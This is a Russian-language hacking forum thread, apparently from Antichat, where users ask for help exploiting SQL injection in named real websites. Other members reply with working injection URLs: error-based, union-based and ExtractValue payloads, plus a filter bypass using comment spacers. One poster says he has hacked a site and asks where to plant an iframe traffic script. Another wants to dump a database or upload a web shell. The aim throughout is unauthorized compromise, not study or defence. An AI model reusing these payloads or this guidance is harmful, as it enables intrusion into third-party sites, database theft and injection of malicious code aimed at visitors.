Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    нет там ничего ИМХО
     
  2. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Попытка слепого метода в Havij

    Почему когда Length of 'Current DB' is 16 все выводит нормально
    А когда Length of 'Current DB' is 63 выводится все в кубиках ?
     
  3. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Не путайте виды инъекций.

    Судя по всему, у вас Blind SQL и Double-Blind (Deep Blind) SQL.

    Если первой достаточно логического уровня и ответов типа true-false, то вторая дополнительно зависит от временных задержек между запросом и ответом сервера.

    При нестабильной реализации 2ого варианта, вы будете получать не только некорректные данные, но и парсить неправильную длину нужных вам данных.

    В вашем случае, Length of 'Current DB' скорее всего равен 62, и инъекция там не наблюдается.
     
    _________________________
  4. [AVT]

    [AVT] Member

    Joined:
    20 Dec 2007
    Messages:
    37
    Likes Received:
    16
    Reputations:
    1
    Code:
    http://www.artena.ru/index.php?altname=sitemap/print/'
    Возможно ли тут продвинуться дальше?)
     
  5. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Не продвинешься

    http://www.artena.ru/index.php?altname=sitemap/print'/**/and/**/(select/**/1/**/from/**/(select/**/(count(*)),concat((select/**/version()/**/from/**/information_schema.tables/**/limit/**/0,1),0x00,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by(x))/**/a)/**/or/**/'

    1044: Access denied for user 'artenaru_artena'@'localhost'
     
    1 person likes this.
  6. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Юнион тоже актуален, в сорцах странице отображается, но бессмысленно)
    HTML:
    http://www.artena.ru/index.php?altname=sitemap/print'union/**/select(1),concat(1999,user(),1,version(),1,database()),34,4,5,6,7,8,user(),'10
     
    1 person likes this.
  7. P-29

    P-29 New Member

    Joined:
    4 Aug 2006
    Messages:
    47
    Likes Received:
    0
    Reputations:
    0
    Можно ли как-то это раскрутить.
    http://playzet.ru/stats/hlstats.php?game=dods&minkills=1&mode=players&rank_type=%5c
     
  8. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Там параметр походу выставляется статически, исходя по известным значениям, по параметрам можно только выбрать.Свой запрос туда не вставить
     
  9. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Не всё потеряно -
    HTML:
    http://playzet.ru/stats/hlstats.php?mode=weaponinfo&weapon=wdeagle\&game=%20or%201=1%20and%20@a:=1%20group%20by%20concat%28user%28%29,version%28%29,database%28%29,if%28@a=0,@a:=1,@a:=0%29%29%20having%20min%280%29%20--%20w
     
    1 person likes this.
  10. Ehrmann

    Ehrmann New Member

    Joined:
    22 Mar 2013
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    подскажите, если havij находит БД и таблицы с названием ???, есть ли смысл крутить что еще?
     
  11. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    В конфигах апача прописан alias, например, /secret-folder/ ссылается на /var/private/secret/.

    И таким образом, при обращении ко всем доменам на сервере по URLу
    domen.com/secret-folder/ все будут попадать туда.

    Можно ли как-то закрыть туда доступ для определенного домена?
    Вариации через .htaccess не работают, так как он имеет меньший приоритет перед конфигами апача.
     
  12. -=Cerberus=-

    -=Cerberus=- κρυπτός γράφω

    Joined:
    29 Apr 2012
    Messages:
    1,321
    Likes Received:
    930
    Reputations:
    391
    но, есть смысл протестировать тот же параметр в SQLMAP :)
     
  13. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Известна версия '5.5.27-log
    Code:
    http://www.briese.net.ua/shkala-zarplat%27and%28select*from%28select%28name_const%28version%28%29,1%29%29,name_const%28version%28%29,1%29%29a%29and%27
    но дальше ни в какую не хочет раскручиваться.
     
  14. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    http://www.briese.net.ua/shkala-zarplawertt%27and%28select%201%20from%28select%201%20from%28select%201%20union%20select%202%20%29fr%20group%20by%20concat%281,user%28%29,@a:=@a-1%29%20having%20min%28@a:=1%29%29s%29%20--%20w
     
    1 person likes this.
  15. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.iglobalforum.com/event.php?id=-90'+/*union*/+/*select*/+1,2,3,4,5/*
    чет не получается :confused: может кто поможет нормально раскурить?
     
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    как посчитали 5 колонок? и что там делает кавычка? скуля же integer..

    http://www.iglobalforum.com/event.php?id=90+and+0+/*!union*/select+1,2,3,4,version(),6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3--+


    вывод в <img src=version()..>
     
    _________________________
    2 people like this.
  17. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    http://wiki.auditory.ru/Semenov_sql_injection'
    Не разберусь, WAF меняет пробелы и "+" "_", обходится /**/. Дальше не могу.
     
    _________________________
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://wiki.auditory.ru/Semenov_sql_injection'or(ExtractValue(1,concat(0x3a,(select(version())))))='1
     
    _________________________
  19. sfinxs

    sfinxs New Member

    Joined:
    20 Feb 2008
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    привет )) взломал сайт а там такое в файле INDEX.PHP такое :

    <?php
    include 'init.php';
    $language = $frontend->getDefaultLanguage();
    $url = NeoRequest::getAbsoluteUri() . $language->ln . _NEO_CMS_FILE_EXT;
    NeoNavigator::jump($url);
    ?>

    и такое :

    <?php
    include 'init.php';
    include 'process.php';
    ?>

    вот как выглядит сама система :
    http://i42.tinypic.com/112hpud.jpg

    КУДА ВСТАВЛЯТь скрипт на ифрейм траффик и вообше почему совсем не такое как везде?
     
  20. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    При переходе на сайте на list.html?page=&page='
    выдает

    Можно как-то раскрутить и попробовать слить бд или залить шелл? Хелпаните..
    Если поставить скобки или другой символ, то же самое выдает.

    С &page=(select+top+1+table_name+from+information_schema.tables)

    Выдает мне Conversion failed when converting the nvarchar value 'Таблица' to data type int. (severity 16) in .....

    но при
    (select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('эта таблица'))
    выдает мне message: Incorrect syntax near 'эта же таблица\'. (severity 15) in ....
     
    #22800 zombak18, 8 Dec 2013
    Last edited: 8 Dec 2013
Thread Status:
Not open for further replies.